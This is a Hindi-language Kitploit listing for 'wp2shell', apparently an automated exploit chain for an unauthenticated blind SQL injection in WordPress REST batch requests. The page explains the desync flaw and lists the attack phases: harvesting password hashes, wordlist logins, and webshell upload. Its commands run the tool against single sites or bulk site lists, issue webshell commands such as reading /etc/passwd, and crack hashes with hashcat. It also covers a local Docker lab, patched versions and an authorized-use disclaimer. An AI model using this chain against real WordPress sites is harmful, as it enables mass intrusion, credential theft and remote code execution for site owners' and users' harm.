Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
wp2shell — CVE-2026-63030 / CVE-2026-60137 के लिए स्वचालित एक्सप्लॉइट श्रृंखला — WordPress REST बैच रूट-कन्फ्यूज़न के माध्यम से बिना प्रमाणीकरण वाला ब्लाइंड SQLi। उपयोगकर्ता हैश डंप करता है, क्रेडेंशियल क्रैक करता है, वेबशेल तैनात करता है। एकल लक्ष्य और बल्क साइट सूचियों का समर्थन करता है। केवल अधिकृत सुरक्षा परीक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/0xwhoknows/wp2shell
पासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHub0xwhoknows/wp2shell

wp2shell

रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

CVE-2026-63030 / CVE-2026-60137 के लिए स्वचालित एक्सप्लॉइट श्रृंखला — WordPress REST बैच रूट-कन्फ्यूज़न के माध्यम से बिना प्रमाणीकरण वाला ब्लाइंड SQLi। उपयोगकर्ता हैश डंप करता है, क्रेडेंशियल क्रैक करता है, वेबशेल तैनात करता है। एकल लक्ष्य और बल्क साइट सूचियों का समर्थन करता है। केवल अधिकृत सुरक्षा परीक्षण के लिए।

साझा करें

wp2shell

WordPress REST बैच रूट-कन्फ्यूज़न ब्लाइंड SQL इंजेक्शन — स्वचालित एक्सप्लॉइट श्रृंखला।

CVE-2026-63030 / CVE-2026-60137

प्रभावितWordPress 6.9.0 – 6.9.4 और 7.0.0 – 7.0.1
फिक्सWordPress 6.9.5 / 7.0.2
Sinkauthor__not_in SQL, desync'd author_exclude पैरामीटर के माध्यम से
प्रमाणीकरण आवश्यककोई नहीं (बिना प्रमाणीकरण SQLi)

केवल अधिकृत सुरक्षा परीक्षण के लिए।


यह कैसे काम करता है

WordPress REST API बैच एंडपॉइंट (/wp-json/batch/v1) नेस्टेड बैच अनुरोधों की अनुमति देता है। एक डबल-नेस्टेड desync पेलोड आंतरिक $matches / $validation ऐरे को शिफ्ट करता है, जिससे एक क्राफ्ट किया गया author_exclude मान बिना सैनिटाइज़ेशन के author__not_in SQL में रूट हो जाता है। यह बिना प्रमाणीकरण के ब्लाइंड boolean + timing SQL इंजेक्शन देता है।

एक्सप्लॉइट श्रृंखला — 4 चरण:

root@kitploit:~
Phase 1  Vulnerability check     batch marker probe + optional SQL timing
Phase 2  Hash harvest            blind SQLi extracts wp_users (login + hash)
Phase 3  Authentication          wordlist attack via wp-login.php
Phase 4  Webshell deployment     plugin ZIP upload -> RCE verify

आवश्यकताएँ

  • Python 3.8+
  • aiohttp
  • colorama
root@kitploit:~
pip install aiohttp colorama

उपयोग

एकल लक्ष्य

root@kitploit:~
python wp2shell.py http://target.com

साइट सूची (प्रति पंक्ति एक URL)

root@kitploit:~
python wp2shell.py sites.txt

साइट सूची + कस्टम पासवर्ड फ़ाइल

root@kitploit:~
python wp2shell.py sites.txt -p pass.txt

ज्ञात क्रेडेंशियल्स (वर्डलिस्ट छोड़ें)

root@kitploit:~
python wp2shell.py http://target.com --user admin --password admin123

टाइमिंग के साथ SQLi की पुष्टि करें

root@kitploit:~
python wp2shell.py http://target.com --confirm-sqli

कोई प्रिटी permalinks नहीं

root@kitploit:~
python wp2shell.py http://target.com --rest-route

Burp प्रॉक्सी के माध्यम से

root@kitploit:~
python wp2shell.py http://target.com --proxy http://127.0.0.1:8080

विकल्प


आउटपुट फ़ाइलें

फ़ाइलसामग्री
creds.txthttp://target=>user:pass (यदि क्रैक हुआ है तो प्लेनटेक्स्ट, नहीं तो हैश)
webshell.txtलाइव webshell URL
VULNERABLE.txtवे सभी लक्ष्य जहाँ चरण 1 ने भेद्यता की पुष्टि की

सभी फ़ाइलें append होती हैं — परिणाम रनों के बीच जुड़ते रहते हैं।

webshell का उपयोग — webshell.txt में URL के अंत में ?cmd=COMMAND जोड़ें:

root@kitploit:~
# browser
http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=id

# curl
curl "http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=id"
curl "http://target.com/wp-content/plugins/wp2shell_XXXX/wp2shell_XXXX.php?cmd=cat+/etc/passwd"

ऑफ़लाइन क्रैकिंग

यदि वर्डलिस्ट चूक जाती है, तो creds.txt में निकाला गया हैश होता है:

root@kitploit:~
hashcat -m 400 creds.txt wordlist.txt

फिर क्रैक किए गए पासवर्ड के साथ दोबारा चलाएँ:

root@kitploit:~
python wp2shell.py http://target.com --user admin --password <plaintext>

लोकल लैब (Docker)

सुरक्षित लोकल परीक्षण के लिए एक भेद्य WordPress 7.0.1 इंस्टेंस बनाता है।

पहला रन — वॉल्यूम बनाएँ और WordPress इंस्टॉल करें:

root@kitploit:~
docker compose up -d db wordpress
docker compose run --rm wpcli

बाद के स्टार्ट:

root@kitploit:~
docker compose up -d db wordpress

रोकें:

root@kitploit:~
docker compose down

पूर्ण रीसेट (सभी डेटा मिटा देता है):

root@kitploit:~
docker compose down -v

लैब के विरुद्ध एक्सप्लॉइट चलाएँ:

root@kitploit:~
python wp2shell.py http://localhost:8080

पैचिंग

WordPress 6.9.5 या 7.0.2 में अपडेट करें। यह फिक्स नेस्टेड अनुरोधों को भेजने से पहले बैच रूट को मान्य करता है, जिससे वह desync रुक जाता है जो SQL sink को उजागर करता है।


कानूनी

केवल उन सिस्टमों पर उपयोग के लिए जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित प्राधिकरण है। अनधिकृत उपयोग अवैध है।

टूल डाउनलोड करें
फ़्लैगडिफ़ॉल्टविवरण
target—URL (http://target) या साइट सूची फ़ाइल का पथ
-p FILE—पासवर्ड सूची फ़ाइल (प्रति पंक्ति एक)
--user—वर्डलिस्ट छोड़ें, इस उपयोगकर्ता नाम का उपयोग करें
--password—वर्डलिस्ट छोड़ें, इस पासवर्ड का उपयोग करें
--confirm-sqlioffमार्कर जांच के बाद सक्रिय SQL टाइमिंग प्रोब भेजें
--rest-routeoff/?rest_route=/batch/v1 का उपयोग करें (कोई प्रिटी permalinks नहीं)
--sleep N3.0SQL SLEEP() विलंब सेकंड में
--samples N3माध्यिका गणना के लिए टाइमिंग नमूना जोड़े
--timeout N30.0HTTP अनुरोध समय समाप्ति
--prefix PREFIXwp_डेटाबेस तालिका उपसर्ग
--proxy URL—HTTP/HTTPS प्रॉक्सी
URLhttp://localhost:8080
एडमिनadmin / admin123
MySQL होस्टdb
MySQL उपयोगकर्ता/पासवर्डwpuser / wppass
डेटाबेसwordpress